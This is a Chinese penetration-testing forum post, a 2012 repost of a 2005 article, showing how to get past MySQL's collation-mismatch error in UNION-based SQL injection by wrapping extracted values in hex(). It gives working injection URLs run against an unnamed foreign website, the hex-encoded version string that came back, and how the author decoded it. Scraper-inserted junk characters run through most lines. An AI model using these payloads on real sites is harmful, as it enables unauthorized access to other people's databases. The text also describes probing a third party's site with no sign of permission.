找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MySQL注射时ErrorNo.1267的突破
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1995|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei
( f" O4 C; q4 w! F9 V文章性质:原创
0 V6 S# L% P1 o, N& W8 v2 |发布日期:2005-10-18* s/ N+ h# t6 ~! l3 ]0 ]4 y7 J
测试个国外的站时:) x- j5 p, G8 [; C
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*+ q. B$ x- q% ~/ f. b4 k
返回错误:+ B* P9 R5 Z4 b1 X+ u; R
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
4 F' z8 g/ W2 VMySQL Error No. 1262 S/ A! X1 H% h5 b/ W' V% p
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
7 J9 s+ M7 O3 f' G/ ?# E" R7 X解决办法:转为其他编码如hex。
" ~$ N* U; }( C6 u- D: Nurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*4 ~/ h  b4 l* R4 e5 _
成功得到hex(version())的值为:
9 y7 _3 p$ D1 U342E312E332D62657461
- z; t, `9 i( y1 `6 s, ~回Mysql查询下得到:
5 c$ A; ^5 U7 Z. f! M; Bmysql> select 0x342E312E332D62657461;
' v' E  K. W; \* Q; a- H0 D( p+------------------------+
4 }& g) d# {# D! ^# e7 d| 0x342E312E332D62657461 |
; a8 e* G4 s+ b' f7 D+------------------------+
( E( C! \; w4 Y" F4 S& X- n| 4.1.3-beta |& N3 ?/ N7 n. d1 d
+------------------------+5 b3 _+ G$ x7 e
1 row in set (0.00 sec)
) H& G; P! ~& ~) G8 J  x8 G0 _
* V, d+ u7 t+ m6 u
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表